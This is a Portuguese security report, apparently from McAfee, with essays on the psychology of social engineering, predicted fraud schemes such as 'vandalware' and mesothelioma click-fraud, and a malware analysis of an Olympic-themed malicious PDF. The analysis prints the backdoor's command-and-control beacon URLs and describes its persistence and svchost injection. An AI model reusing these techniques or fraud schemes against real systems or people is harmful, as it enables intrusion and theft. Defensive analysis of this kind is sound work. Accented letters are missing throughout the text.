Nossa suscetibilidade engenharia social est enraizada no funcionamento do crebro humano, na interao complexa entre os centros da emoo e da razo. Engenharia social a manipulao do medo, da curiosidade, da ganncia ou da simpatia de uma vtima. Os erros e propenses cognitivas de nossos esquemas sociais ajudam a explicar o xito da engenharia social. Ento, porque esse conhecimento to valioso para ns? Na pesquisa de segurana e crimes de informtica de 2007 do CSI, somente 13% dos entrevistados disseram ter vericado a eccia do treinamento de seus funcionrios contra ataques de engenharia social.21 Embora 13% seja um valor baixo, a pesquisa no incluiu os entrevistados que no tiveram treinamento algum para ataques de engenharia social. Uma etapa bvia criar e aprimorar as polticas de segurana e os programas de treinamento dos usurios em relao engenharia social. Qualquer poltica sobre engenharia social ser mais persuasiva se utilizar a pesquisa cientca para se justicar. Os materiais de treinamento dos usurios tambm sero mais ecazes se listarem as propenses cognitivas que os engenheiros sociais geralmente exploram e os vdeos de treinamento sero mais ecazes se demonstrarem os ataques que exploram cada uma de nossas propenses cognitivas. No podemos mudar a natureza humana. Nascemos com uma separao entre nossas emoes e a razo, e estamos propensos a cometer erros mentais. Isso normal, mas tal comportamento perigoso quando explorado por engenheiros sociais. Ao compreender a psicologia da engenharia social e ao treinar os usurios quanto a seus efeitos, podemos nos defender melhor contra esses ataques.
Karthik Raman, CISSP, cientista pesquisador no McAfee Avert Labs. Sua pesquisa de segurana inclui anlise de vulnerabilidades, segurana de rede e segurana de software. Alm da segurana, seus interesses incluem cincias sociais e cognitivas e programao de computadores. Como lazer, Raman joga crquete, toca violo e aprende outros idiomas. Raman formou-se bacharel em cincia da computao e segurana de computadores pela Universidade de Norwich (Vermont) em 2006.
Notas de rodap
1 Bank loses $1.1M to online fraud, (Banco perde US$1,1 milho em fraude online,) BBC (2007). http://news.bbc.co.uk/2/hi/business/6279561.stm 2 Schneier, B., The Psychology of Security (A psicologia da segurana), ensaios e editoriais (2007). http://www.schneier.com/essay-155.html 3 Ib. 4 Asimov, I. The Human Brain: Its Capacities and Functions (O crebro humano: suas capacidades e funes), New York: Mentor Books, 1965. 5 Johnson, S. Mind Wide Open: Your Brain and the Neuroscience of Everyday Life. (Mente bem aberta: seu crebro e a neurocincia do cotidiano), New York: Scribner, 2004. 6 Svoboda, E. Cultivating curiosity; how to explore the world: Developing a sense of wonder can be its own reward (Cultivar a curiosidade; como explorar o mundo: desenvolver um senso de deslumbramento pode ser sua prpria recompensa), Psychology Today (2006). http://psychologytoday.com/articles/index.php?term=pto-4148.html 7 Leyden, J. Hackers debut malware loaded USB ruse (Hackers estriam o ardil do USB carregado de malware),The Register (2007). http://www.theregister.co.uk/2007/04/25/usb_malware/ 8 McAfee VIL: GPCoder.i, 9 de junho de 2008. http://vil.nai.com/vil/content/v_145334.htm 9 Cialdini, R. Inuence: The Psychology of Persuasion (Inuncia: a psicologia da persuaso), New York: HarperCollins, 1998. 10 Heuer, Richard J., Jr. The Psychology of Intelligence Analysis (A psicologia da anlise inteligente), Center for the Study of Intelligence (Centro para o estudo da inteligncia), CIA (2002). http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html 11 Tversky, A. e Kahneman, D. Judgment under uncertainty: Heuristics and biases (Julgamento diante da incerteza: heurstica e propenses), Science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf 12 Mather, M., Shar, E. e Johnson, M. K. Misrememberance of options past: Source monitoring and choice (Reminiscncias falhas de opes passadas: monitoramento de fontes e escolha), Psychological Science, 11, 132-138 (2000). http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf 13 Nickerson, R. S. Conrmation Bias: A Ubiquitous Phenomenon in Many Guises (Propenso conrmao: um fenmeno presente em muitas formas), Review of General Psychology, Vol. 2, N. 2, 175-220 (1998). http://psy.ucsd.edu/~mckenzie/nickersonConrmationBias.pdf 14 Zajonc, R. B. Attitudinal Effects of Mere Exposure (Efeitos da mera exposio sobre as atitudes), Journal of Personality and Social Psychology, 9, 2, 1-27 (1968). 15 Kaplan, D. Virginia Tech massacre may spawn phishing scams (O massacre de Virginia Tech pode propiciar fraudes por phishing), SC Magazine (2007). http://www.scmagazineuk.com/Virginia-Tech-massacre-may-spawn-phishingscams/article/105989/ 16 Tversky, A. e Kahneman, D. Judgment under uncertainty: Heuristics and biases (Julgamento diante da incerteza: heurstica e propenses), Science, 185, 1124-1130 (1974). Disponvel em http://psiexp.ss.uci.edu/research/teaching/ Tversky_Kahneman_1974.pdf. 17 Dhamija, R., Ozment, A., Schecter, S. The Emperors New Security Indicators: An evaluation of website authentication and the effect of role playing on usability studies (Os novos indicadores de segurana do imperador: uma avaliao da autenticao em sites e o efeito da representao de papis em estudos de usabilidade), (2008). http://www.usablesecurity.org/emperor/ 18 Mitnick, Kevin D., Simon, William L. The Art of Deception (A arte de enganar), Indianapolis: Wiley Publishing, Inc., 2002. 19 Gilbert, D. T., e Malone, P. S. The correspondence bias (A propenso correspondncia), Psychological Bulletin, 117, 2138 (1995). http://www.wjh.harvard.edu/~dtg/Gilbert%20&%20Malone%20 (CORRESPONDENCE%20BIAS).pdf 20 Taylor, S.E. e Fiske, S.T. Point of view and perception of causality (Ponto de vista e percepo da causalidade), Journal of Personality and Social Psychology, 32, 439-445 (1975). 21 Computer Security Institute, pesquisa de segurana e crimes de informtica do CSI (2007). http://www.gocsi.com/forms/csi_survey.jhtml ( necessrio se registrar)
12
Engenharia social 2.0: Qual a prxima

Por Markus Jakobsson
Embora a engenharia social provavelmente exista desde o incio da civilizao humana, muitos se preocupam com sua atual transformao e impacto prejudicial sobre a Internet. Neste artigo, fazemos algumas previses sobre o que pode vir em seguida.
Poucos discordam de que a atual onda de crimeware alimentada por motivaes econmicas. As condies atuais so totalmente diversas do passado. No incio, os vrus eram simplesmente uma expresso de curiosidade intelectual, competitividade e, talvez, um pouco de tdio. Isso ca ainda mais claro quando tratamos de fraude de cliques e phishing. Que outra motivao pode haver alm de ganhar um pouco de dinheiro fcil? (Ou, freqentemente, muito dinheiro fcil.) O mesmo se aplica ao spam em suas vrias formas. Se os spammers no pudessem ganhar dinheiro com isso, no haveria spam. , portanto, razovel considerar as maneiras pelas quais os criminosos podem monetizar abusos de recursos existentes da Internet para que possamos prever as tendncias das fraudes.
As defesas modelam os ataques

Do ponto de vista dos criminosos, a fraude de Internet um crime relativamente seguro e confortvel. Alm de ser o sonho de qualquer escroque que prera trabalhar remotamente, a fraude de Internet pode ser expandida, permite lucros elevados, difcil de rastrear e, portanto, de risco muito limitado. No de se admirar que a fraude de Internet tenha atingido tamanhas propores. Contudo, para entender os ataques, precisamos tambm entender as defesas. Est claro que os crimes esto sendo combatidos em trs planos separados atualmente: recursos tcnicos (como software antivrus, ltros de spam e plug-ins antiphishing para os navegadores); campanhas educativas (como as conduzidas por FTC, eBay, SecurityCartoon.com, bancos, e pelo grupo Carnegie Mellon University Usable Privacy and Security Laboratory (CUPS)); e, nalmente, por meios legais. O empenho jurdico costuma envolver o rastreio das origens, a busca dos locais de distribuio e, nalmente, o processo penal dos transgressores. Enquanto as iniciativas tcnicas e educativas quando bemsucedidas resultam em menores rendimentos para os criminosos, o empenho jurdico resulta em um risco maior. Esses riscos so uma questo importante, especialmente considerandose a escalada das fraudes de Internet. Portanto, lcito supor que a prxima fronteira do crime de Internet envolver um componente que o torne menos rastrevel. Vamos partir desse princpio e investigar o que isso pode signicar para o futuro. Faremos isso considerando dois tipos de ataques de difcil rastreamento, nenhum dos quais ocorreu at hoje, mas que no tardam em acontecer. Primeiramente, porm, para compreender verdadeiramente a importncia do aspecto jurdico, vamos digressar um pouco e avaliar porque o ransomware (vrus seqestrador) nunca se tornou a calamidade que as pessoas pensavam que seria.
Fraude de Internet: um crime scio-tecnolgico

Um nmero cada vez maior de especialistas reconhece que a fraude no mais apenas uma questo tcnica, mas que h um componente cada vez mais presente de engenharia social. Phishing um exemplo perfeito disso, mas no o nico. Nestes dias, cada vez mais comum ver ataques de crimeware que se baseiam na engenharia social para se instalarem. Um exemplo recente disso a chamada fraude Better Business Bureau, mostrada na gura 1. Nesse ataque de phishing, uma vtima potencial recebe um email que parece vir do Better Business Bureau, relacionado a um processo contra a organizao do destinatrio. O anexo, que supostamente contm os detalhes do autor do processo, na realidade contm um carregador de cavalo de Tria. Para piorar, esses emails costumam ser enviados para pessoas de altos escales da organizao-alvo freqentemente para indivduos que lidam diariamente com reclamaes de clientes.
13
O fracasso do ransomware
No nal dos anos 90, pesquisadores da Universidade de Columbia propuseram que a prxima onda de malware poderia manter refns os arquivos do computador da vtima atravs de criptograa, utilizando uma chave pblica transportada no corpo do malware, e exigir um resgate pelo fornecimento da chave secreta, com a qual reaver o acesso aos arquivos criptografados. Anos depois, o cavalo de Tria Archiveus realizou um ataque assim, mas com uma pequena diferena: ele utilizava criptograa de chave simtrica em vez de uma chave pblica. O ataque foi frustrado quando o cavalo de Tria sofreu engenharia reversa e a chave de criptograa/decodicao foi extrada e distribuda para todos os que foram atacados. No entanto, o ataque do Archiveus talvez no tivesse xito mesmo que ele utilizasse criptograa de chave pblica (o que, por sua natureza, teria evitado a obteno da chave de decodicao atravs de engenharia reversa do cdigo, uma vez que a chave no estaria contida no cdigo). O motivo pelo qual o Archiveus fracassou no tcnico, mas reside no aspecto da monetizao. no havia como os criminosos receberem o resgate com segurana, sem serem rastreados.
E o que aconteceria se algum abrisse ou executasse o arquivo em anexo? Supondo que o email no terminasse na pasta de spam e que o sistema antivrus no o interceptasse, teramos uma infeco em um computador com acesso a dados condenciais ou ao site corporativo. E se alguns desses dados condenciais chegassem Internet, talvez ao prprio site da empresa? Seria um escndalo pblico e o preo das aes seria afetado. Ento, o criminoso exerceria suas opes de venda, capitalizando na aposta anterior de que as aes da empresa cairiam de valor. Tal procedimento no tornaria o atacante rastrevel, visto que todo investidor com opes de venda estaria na mesma situao. Quem o criminoso? Ningum saberia dizer.
Falsicao de cliques
A fraude de cliques um outro tipo comum de fraude on-line. Ela tira proveito do fato de que, quando um consumidor clica em um anncio, o anunciante paga uma comisso, tanto ao site que exibe o anncio quanto ao portal que hospeda o site com o anncio. Tipos relacionados de fraude tiram proveito da propaganda na qual o dinheiro transferido quando o consumidor visualiza um anncio do tipo banner (quer ele execute ou no alguma ao) e outras abordagens nas quais uma venda ou outra ao gerada como resultado de algum visualizar um anncio. O objetivo seria lucrar com essas transferncias (os criminosos se beneciam quando seus sites exibem os anncios) ou para drenar os oramentos de propaganda dos concorrentes (quando os concorrentes so os anunciantes dos quais o dinheiro transferido). Freqentemente, os criminosos geram trfego de uma maneira automatizada, fazendo parecer que pessoas reais visualizaram os anncios. A automao pode incluir alguma forma de malware, como uma rede de bots.
Caso de reclamao ao BBB
O ataque do vandalware
Com o exemplo do ransomware em mente, consideremos um novo tipo de ataque, o qual chamamos de vandalware. Esse ataque no consiste em vandalismo por diverso ou provocao, mas por lucro. Eis o que o criminoso faria: primeiro, ele ou ela escolheria uma empresa como alvo e utilizaria tcnicas de minerao de dados para obter tantas informaes detalhadas quanto possvel sobre funcionrios vulnerveis. Por funcionrios vulnerveis, queremos dizer funcionrios com acesso a dados condenciais ou pgina da empresa na Web. A partir do funcionrio vulnervel, o vndalo poderia conhecer a estrutura interna da empresa, os nomes dos principais funcionrios e o formato dos endereos de email. Segundo, o criminoso compraria opes de venda dessa empresa. (Estamos supondo que se trate de uma empresa com aes negociadas na bolsa.) Uma opo de venda um instrumento nanceiro que aumenta de valor caso o preo da ao correspondente caia; os investidores e especuladores utilizam as opes de venda para obter lucro a partir da perspectiva de que uma determinada ao v perder valor. Muito provavelmente, outros investidores, e no apenas o criminoso, tambm comprariam opes de venda, especialmente caso as aes da empresa-alvo tivessem um volume negociado razovel. Terceiro, o criminoso lanaria um ataque contra a empresa, talvez enviando para determinados funcionrios mensagens falsicadas de email aparentemente oriundas de um outro funcionrio, como, por exemplo, um superior: Ol Jim. D uma olhada nos slides de PowerPoint em anexo e diga o que voc acha. Se possvel, eu gostaria de uma avaliao rpida at amanh de manh. Espero que voc consiga. Ou, talvez, de um administrador de sistemas: H um novo vrus de computador perigoso e nossos sistemas ainda no esto com o patch necessrio para nos defendermos. Instale imediatamente no seu computador o programa em anexo para nos ajudar a continuar protegidos. Faa isso assim que puder.
BBB CASE #569822971

Complaint filed by: Michael Taylor Complaint filed against: Business Name: Contact: BBB Member:
SFlbComplaint status: Category: Contract Issues Case opened date: 2/28/2008 Case closed date: *** Attached you will find a copy of the complaint. Please download and keep this copy so you can print it for your records.*** On February 26 2008, the consumer provided the following information: (The consumer indicated he/she DID NOT received any response from the business.) The form you used to register this complaint is designed to improve public access to the Better Business Bureau of Consumer Protection Consumer Response Center, and is voluntary. Through this form, consumers may electronically register a complaint with the BBB. Under the Paperwork Reduction Act, as amended, an agency may conduct or sponsor, and a person is not required to respond to, a collection of information unless it displays a currently valid OMB control number. That number is 502-793. 2008 BBB.org, All Rights Reserved. <Complaint_569822971.doc>
Figura 1: A fraude Better Business Bureau. O email contm um anexo infectado que o atacante espera que seja aberto pelo destinatrio.
14
Uma outra abordagem comum os criminosos contratarem pessoas para clicar em deter-minados anncios, no que se convencionou chamar de click farm. Agora descreveremos como a engenharia social pode ser utilizada em um novo tipo de ataque de fraude de cliques. Primeiro, comearemos explicando um cenrio comum que no fraude de cliques:
Cenrio 1 Site padro. Imagine um site legtimo que oferea algum servio e que exiba anncios relacionados a esse servio. O contedo dos anncios costuma ser determinado de maneira automtica pelos portais de anncios (por exemplo, Google e Yahoo) atravs de um exame automtico do site e pela seleo de anncios sobre tpicos relacionados ao contedo. Se o site especicamente sobre culinria, por exemplo, os anncios podem ser relacionados a potes, panelas e mquinas de caf. Esses sites tambm costumam colocar anncios que atraem trfego. Assim, pode-se esperar anncios com palavras-chave tais como faca, Calphalon, Teon e termos semelhantes. No h nada de incomum nesse tipo de site. Cenrio 2 Uso da arbitragem. Imagine agora um segundo site que tenha um contedo que selecione anncios correspondentes s palavras-chave ache o advogado (nd an attorney). (Oartigo o (a) mesmo, e no um (an). Explicaremos logo o porqu.) O site pode fazer isso tendo bastante texto (seja visvel ou no) que repita essa frase. No momento em que este artigo foi escrito, o custo desse tipo de estratgia estava na faixa de US$1,07 a US$7,05 por palavra-chave (valores referentes a palavras em ingls). O preo exato depende do local, da hora do dia e, naturalmente, dos lances concorrentes dados pelas palavras-chave, porque todos os preos de palavra-chave so estabelecidos em leiles. Assim, se um usurio clica em um anncio nesse site, o dono do anncio correspondente paga esse valor ao portal, o qual, por sua vez, transfere o valor subtrado da comisso para o site que exibiu o anncio.
O criminoso compra trfego para a palavra-chave asma (US$0,10) para trazer os visitantes a seu site. Se pelo menos uma dentre 634 pessoas que chegarem a seu site clicar no anncio sobre mesotelioma, ele ter lucro. Mas por que algum faria isso? Suponha que o contedo do site seja um artigo, aparentemente escrito por um mdico, perguntando Voc sabia que 10% das pessoas que tm asma correm risco de contrair mesotelioma? Embora essa armativa no seja verdadeira, ela far com que muitas pessoas preocupadas com asma e desconhecedoras do que seja mesotelioma faam exatamente o que o criminoso deseja: clicar. E se metade dos visitantes cair no truque? Com mil visitantes por dia, isso signica um lucro dirio de mais de US$30.000. At mesmo com palavras-chave menos evidentes, o criminoso ainda pode ter um lucro considervel. O que torna esses trs cenrios diferentes a inteno e o uso da engenharia social. Do ponto de vista dos provedores de anncios, esses trs cenrios so estruturalmente bastante semelhantes. Um visitante chega, l o contedo e clica em um anncio. Embora seja possvel fazer uma correspondncia entre palavras-chave de entrada e de sada para descobrir anomalias, tambm possvel que os criminosos utilizem um provedor de servios para trazer o trfego e outro para lev-lo. Essa estratgia torna difcil detectar e deter esse tipo de ataque, especialmente quando ele realizado em pequena escala utilizando um grande nmero de sites.
Concluso
A engenharia social na Internet veio para car. J testemunhamos seus efeitos atravs de fraudes de phishing e estamos comeando a ver como os criminosos utilizam a engenharia social para aumentar a ecincia do spam e do crimeware. Receamos que aplicativos ainda mais hbeis do que os atuais estejam espreita, como no uso da engenharia social para outros tipos de fraude como a fraude de cliques. Podemos planejar contramedidas tcnicas tendo isso em mente e compreendendo as maneiras como os ataques provavelmente ocorrero, para ajudar a melhorar as defesas. Mas precisamos tambm compreender que nossa estratgia requer melhores interfaces de usurio, melhores procedimentos, legislao mais forte e educao aprimorada. Nossos heris ainda tm muito trabalho pela frente.
Em seguida, imagine que o site em questo coloque um anncio utilizando as palavras-chave ache um advogado. A nica diferena aqui o artigo um em vez de o. Afaixa de preo para essa palavra-chave de US$0,87 a US$3,82. Vamos supor que o site pague US$2,00 por cada visitante recebido e que ganhe US$4,00 por cada visitante que clique em um anncio do site. Contanto que 50% dos visitantes cheguem atravs do clique no anncio de US$2,00 em um anncio de US$4,00, o site lucra sem fornecer servio algum. Isso o que se chama de arbitragem de palavraschave. No propriamente uma fraude de cliques, mas parecida, como veremos a seguir.
Cenrio 3 Um ataque utilizando engenharia social. Agora veremos como um criminoso pode utilizar a engenharia social e estender a tcnica de arbitragem para ter lucros espetaculares. Suponhamos que o criminoso produza um site que gere a palavra-chave mesotelioma (uma forma rara de cncer causada por exposio a amianto). No momento em que escrevemos, essa palavra-chave vale US$63,42 no Google.
O Dr. Markus Jakobsson gerente de pesquisa no Palo Alto Research Center. Ele pesquisa phishing e contramedidas, fraude de cliques, o fator humano na segurana, criptograa, segurana de redes e desenvolvimento de protocolos. Ele editor da Phishing and Countermeasures (Phishing e contramedidas) (Wiley, 2006) e co-autor de Crimeware: Understanding New Attacks and Defenses (Crimeware: entenda os novos ataques e defesas) (Symantec Press, 2008).
Imagem por cortesia da PARC; fotgrafo: Brian Tramontana
15
Um alvo preferencial para o malware de engenharia social

Por Elodie Grandjean
Os criadores de malware costumam utilizar mtodos de engenharia social para infectar diretamente um sistema ou host, ou para iniciar um efeito em cascata de download e execuo de malware.
A maioria de ns j recebeu algum email contendo um URL ou anexo malicioso ao ler sobre uma importante atualizao de segurana ou sobre um amigo de muito tempo atrs que deseja restabelecer contato. No se deixe enganar pensando que o email o nico vetor de ataque para disseminao de malware atravs de truques de engenharia social. Existem vrios outros artifcios, incluindo o uso dos populares servios de mensagens instantneas. O sistema comprometido de um amigo pode enviar a voc uma mensagem com um URL apontando para um arquivo e pedir que voc veja algumas fotos. O problema que voc cona no contato e desconhece que o outro sistema est infectado. Em muitos casos, o URL aponta para algum malware. Outros tipos de malware utilizam engenharia social para roubar informaes condenciais, como credenciais de login, nmeros de cartes de crdito, etc. Essas tcnicas costumam ser utilizadas em ataques de phishing ou em intruses em servidores. Os truques de engenharia social mais comuns que os criadores de malware utilizam so para servios adultos. Eis uma lista de alguns dos outros tipos:

Emails falsos de bancos, servios de pagamento on-line e outros servios nanceiros. Estes solicitam uma conrmao ou uma atualizao de credenciais de login ou de informaes de carto de crdito Emails com ameaas, mencionando procedimentos jurdicos ou penas de priso Jogos e protetores de tela gratuitos contendo cavalos de Tria ou ferramentas antispyware grtis, os quais freqentemente so os prprios programas nocivos Grandes eventos, como esportes, desastres climticos de grandes propores ou notcias urgentes Nomes de celebridades e relatos de suas aventuras e escndalos Relacionamentos secretos ou potencialmente conveis, como aliao a sites de rede social, falsos amigos, colegas de classe ou parentes e admiradores secretos
Imagens e links pornogrcos Utilizao de um nome de mulher no campo de remetente Programas polticos, incluindo pedidos de contribuies em nome de um candidato popular
A lista de tpicos potencialmente ilimitada e h diversas formas de apelo a grandes grupos de usurios globais. A lista tambm destaca o fato de que a engenharia social freqentemente pode atingir grupos de usurios nacionais ou at locais. Por exemplo, um ataque global com referncia a um site de rede social popular pode trazer respostas do mundo inteiro para o autor do malware; por outro lado, um ataque semelhante sobre a eleio presidencial dos EUA provavelmente enganar apenas vtimas norte-americanas.
16
Por que as Olimpadas?

A China tem estado sob os holofotes h meses devido aos Jogos Olmpicos de 2008 em Pequim. O interesse da mdia tem sido enorme, com cobertura sobre os atletas, fs, infra-estrutura, meio ambiente e poltica, entre outros tpicos. No front poltico, protestos quanto situao do Tibete tm sido um tpico bastante delicado; muitas organizaes de libertao do Tibete do mundo inteiro se beneciaram do destaque dado s Olimpadas. Outras questes relacionadas a trabalho escravo e direitos humanos tambm tiveram destaque. E muitos usurios de Internet esto sucientemente interessados em ler notcias e outras histrias on-line. A tocha olmpica tornou-se um smbolo relevante para os manifestantes na corrida para os jogos. A viagem da tocha pelo mundo teve uma enorme cobertura de mdia e desenvolveu ainda mais interesse e envolvimento entre fs e oponentes. Esse interesse crescente tambm aumentou o tamanho da rea de ataque potencial que os criadores de malware podem explorar.
A utilizao dos Jogos Olmpicos como enfoque de engenharia social permitiu que os autores de malware visassem muitos entusiastas pelo esporte, bem como todas as pessoas anteriormente visadas por seu interesse no conito entre Tibete e China.
Amostragem de vtimas
Um ataque de engenharia social normalmente precisa de uma amostra prvia de suas vtimas para ser bem-sucedido. Vejamos quem so as vtimas potenciais de um ataque utilizando o conito entre China e Tibete ou os Jogos Olmpicos como isca. J vimos indivduos de grupos pr-Tibete receberem emails contendo um anexo CHM (arquivos de ajuda compilados), PDF, PPT, XLS ou DOC relacionado situao do Tibete, China em geral ou s Olimpadas. Todos esses emails parecem ter sido enviados por uma pessoa ou organizao convel. provvel que esses usurios estivessem acostumados a receber tais documentos de seus partidrios e que talvez no estivessem muito precavidos. Esses anexos, em particular, eram maliciosos: eles utilizaram vrias vulnerabilidades do Microsoft Compiled HTML Help, Adobe Acrobat, Microsoft Excel, Microsoft PowerPoint ou Microsoft Word para instalar e executar discretamente arquivos executveis incorporados. A essa altura, a rea-alvo de ataque era relativamente pequena, mas a cobertura de mdia dos manifestantes pelo Tibete ajudou a acender o pavio. Mais tarde, testemunhamos que alguns sites legtimos dedicados a apoiar o Tibete foram vtimas de hackers que inseriram o cavalo de Tria Fribet,1 que pode fazer download de si prprio nas mquinas dos visitantes explorando vulnerabilidades de navegadores da Web.
Nesse estgio, a base de vtimas aumentou de organizaes-alvo e seus partidrios para qualquer um que estivesse curioso quanto situao no Tibete. Novamente, a ateno da mdia ajudou nesse aumento da populao vulnervel. Em seguida, os criadores de malware tiraram proveito dos prprios Jogos Olmpicos para propagar ataques de engenharia social com o aparecimento do rootkit pr-Tibete.2 Esse conjunto malicioso de arquivos operava disfarado como um arquivo de vdeo ridicularizando os esforos de um ginasta chins; enquanto o desenho animado era apresentado, vrios arquivos maliciosos eram discretamente instalados e um rootkit era instalado no computador da vtima para ocult-los. A utilizao dos Jogos Olmpicos como enfoque de engenharia social permitiu que os autores de malware visassem muitos entusiastas pelo esporte, bem como todas as pessoas anteriormente visadas por seu interesse no conito entre Tibete e China.
17
Estudo de caso: Um ataque de malware olmpico

Recentemente recebemos o arquivo PDF declaration_olympic_ games_eng.pdf, inicialmente enviado por email para um grupo pr-Tibete. (Veja a gura 1.) Esse documento parecia inocente porque, quando o aplicativo era aberto, o texto aparecia e nada de anormal acontecia imediatamente. Assim, muitas pessoas no suspeitavam de qualquer atividade maliciosa. No entanto, em segundo plano, alguns arquivos maliciosos eram discretamente criados nas mquinas das vtimas. Vejamos exatamente como funciona o ataque. Na realidade, declaration_olympic_games_eng.pdf um arquivo PDF vazio que explora uma vulnerabilidade do Acrobat para instalar e executar a primeira parte do pacote malicioso. Esse arquivo executvel malicioso (detectado como BackDoor-DOW3) incorporado em uma forma criptografada na seguinte localizao, mostrada no editor hexadecimal da gura 2 (prxima pgina). A gura 3 (prxima pgina) mostra os primeiros bytes do arquivo incorporado, uma vez decodicado.
Esse arquivo executvel instala o arquivo PDF legtimo book.pdf, que exibido quando executamos o primeiro arquivo. O arquivo instalador procura o processo AcroRd32.exe na lista de processos ativos, localiza o diretrio onde o Acrobat est instalado e, em seguida, abre book.pdf. A gura 4, na prxima pgina, mostra o cdigo do arquivo instalador responsvel por isso. O malware tambm instala um outro arquivo executvel, book. exe, que copia a si prprio sob %ALLUSERSPROFILE%\Application Data\msmsgs.exe e cria um novo servio do Windows.4 Esse novo servio atua e aparece como Logical Disk Manager Service (servio gerenciador de disco lgico) e garante que o Windows execute automaticamente o cavalo de Tria na inicializao. O malware possui at um Plano B para interceptar o processo de inicializao: Caso no consiga criar o servio, ele adiciona uma nova entrada no Registro, Windows Media Player, apontando para msmsgs.exe. Windows Media Player adicionado seguinte chave de inicializao no Registro do Windows5: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run. O cavalo de Tria tambm cria dois arquivos contendo alguns dados criptografados:

C:\WINDOWS\jwiev.log.bak C:\WINDOWS\clocks.avi.bak
Sponsors declaration of responsibility at the 2008 Beijing Olympic Games

WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares: We reaffirm our commitment to the harmonious development of man, with a view to promoting a peaceful society concerned with the preservation of human dignity, as set forth in the Olympic Charter, and We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and We are fully aware of the assurance made by the government of the Peoples Republic of China to the Olympic Committee to improve its human rights record as a condition for hosting the Olympic Games and recognize the worldwid concerns expressed about Chinas human rights record. IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by: FIRST, making bona fide good faith efforts to raise the issue of human rights with our Chinese contacts and to publicly report on our efforts to do so, and SECOND, designating a high-level executive within our organization to monitor every aspect of our activities associated with the Olympics and to assure that our actions properly reflect our commitment to human dignity and human rights, and THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and FOURTH, presenting a corporate resolution to our Board of Directors resolving to adopt this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencemento of the 2008 Olympic Games in Beijing, and FIFTH, incorporating this Declaration of Responsibility into our commercial messages. DECLARED BY
Figura 1: Manifestantes prTibete receberam recentemente este arquivo aparentemente legtimo como um anexo de email.
Name/Title Date
18
Finalmente, book.exe faz uma limpeza criando um arquivo de lote que exclui a si mesmo e se encerra. A partir desse ponto, msmsgs.exe assume o comando. Msmsgs.exe instala temporariamente um outro arquivo no seguinte local: C:\Arquivos de programas\WindowsUpdate\ Windows Installer.exe. Imediatamente antes de ser excludo, o Windows Installer.exe instala duas cpias de um arquivo DLL em:

O cdigo malicioso injetado em svchost.exe chama a funo workFunc() a partir de avp01.lic, que se conecta a um servidor remoto e envia trs solicitaes:
http://www1.palms[removido]/ld/v2/loginv2.asp?hi=2wsdf351&x =0720080510150323662070000000&y=192.168.1.122&t1=ne http://www1.palms[removido]/ld/v2/votev2.asp?a=7351ws2&s= 0720080510150323662070000000&t1=ne http://www1.palms[removido]/ld/v2/logoutv2.asp?p=s9wlf1&s= 0720080510150323662070000000&t1=ne
C:\Documents and Settings\All Users\DRM\drmv021.lic C:\Documents and Settings\All Users\DRM\avp01.lic
O malware injeta a si prprio em svchost.exe para ocultar suas atividades. Ele inicia uma nova ocorrncia de svchost.exe (oprocesso de sistema legtimo6), aloca um bloco de memria dentro do espao de endereo desse novo processo, grava uma cpia de si mesmo no espao de endereo virtual de svchost.exe (no endereo 0x400000) e executa o cdigo malicioso criando um thread remoto.
Os parmetros x e y podem diferir. O valor de x formado pela concatenao de 07 com a data (2008/05/10) e a hora (15:03:23) exatas de quando o arquivo clocks.avi.bak foi criado, terminando com a seqncia xa 662070000000. O valor de y o endereo IP do computador da vtima.
Figura 2: Esse PDF malicioso levava uma cpia criptografada do malware BackDoor-DOW. Figura 4: O malware procura pelo Acrobat Reader (AcroRd32.exe) e, em seguida, abre o inocente arquivo book.pdf.
Figura 3: A verso no criptografada do BackDoor-DOW.
19
Os trs scripts de servidor loginv2.asp, votev2.asp e logoutv2.asp servem, respectivamente, para informar ao atacante que uma nova mquina comprometida est disponvel, para vericar se um comando foi enviado pelo atacante e para parar o backdoor. Para ler a resposta enviada aps a conexo a um dos scripts de servidor, o cavalo de Tria cria uma cpia da pgina da Web retornada na seguinte pasta: C:\Arquivos de programas\InstallShield Installation Information\ O nome do arquivo consiste em um valor aleatrio de seis dgitos e, uma vez lido, o arquivo excludo. loginv2.asp e logoutv2.asp retornam apenas pginas da Web vazias (com tags <html><head></head></html>), mas votev2.asp retorna um cdigo que signica, basicamente, O backdoor est pronto, mas no h ao necessria no momento (@n4@300@) ou um comando como um dos seguintes:
Essa tendncia do malware pode se difundir nos prximos meses. uma preocupao sria porque a maioria das pessoas cona nos fornecedores de segurana; se essa conana fosse perdida, muitos usurios provavelmente sofreriam ainda mais.
Software e sites nocivos

Armadilhas criativas para ataques de engenharia social no se limitam a eventos esportivos. Durante vrios meses, observamos um aumento no software malicioso que se faz passar por aplicativos de fornecedores de segurana. Esses programas induzem as vtimas a infectar os prprios computadores enquanto aparentam ser teis. Diversas variantes do cavalo de Tria FakeAlert7 avisam suas vtimas que suas mquinas esto infectadas (que ironia!) e fornecem informaes (freqentemente URLs maliciosos) para obteno de ferramentas antispyware, que so, na verdade, os prprios aplicativos nocivos. Dada a importncia de se manter o software atualizado, no demorou muito para que os falsos sites de atualizao comeassem a imitar o verdadeiro site Windows Update. Descobrimos recentemente um mtodo sosticado de utilizar componentes de DLL vinculados a um site Windows Update falso que impedia o Internet Explorer de avisar os usurios quando um servidor Web remoto utilizava um certicado invlido para um site seguro (HTTPS). A nalidade desse ataque era disfarar os sites maliciosos como verdadeiras atualizaes do Windows para as vtimas fazerem download e executar. Essa tendncia do malware pode se difundir nos prximos meses. uma preocupao sria porque a maioria das pessoas cona nos fornecedores de segurana; se essa conana fosse perdida, muitos usurios provavelmente sofreriam ainda mais.
